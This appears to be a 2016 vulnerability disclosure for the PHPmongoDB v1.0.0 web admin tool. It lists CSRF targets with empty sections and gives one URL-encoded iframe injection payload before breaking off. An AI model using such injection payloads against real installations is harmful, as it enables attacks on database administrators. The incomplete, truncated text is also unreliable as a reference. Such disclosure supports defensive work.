################################################################################################################################################# # Exploit Title: PHPmongoDB v1.0.0 - Multiple Vulnerabilities [CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)] # Date: 14.04.2016 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.phpmongodb.org # Software Link: https://github.com/phpmongodb/phpmongodb # Version: 1.0.0 ################################################################################################################################################# Introduction A Tool available for administrative work of MongoDB over Web. It is PHPmongoDB. source = http://www.phpmongodb.org Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored) CSRF details: ################################################################################################################################################# CSRF1 Create Database ################################################################################################################################################# CSRF2 Drop Database ################################################################################################################################################# CSRF3 Create Collection ################################################################################################################################################# Drop Collection ################################################################################################################################################# Execute Code ################################################################################################################################################# Logout ################################################################################################################################################# HTML Injection details: ################################################################################################################################################# HTML Injection1 URL http://localhost/phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E METHOD Get PARAMETER URL PAYLOAD /">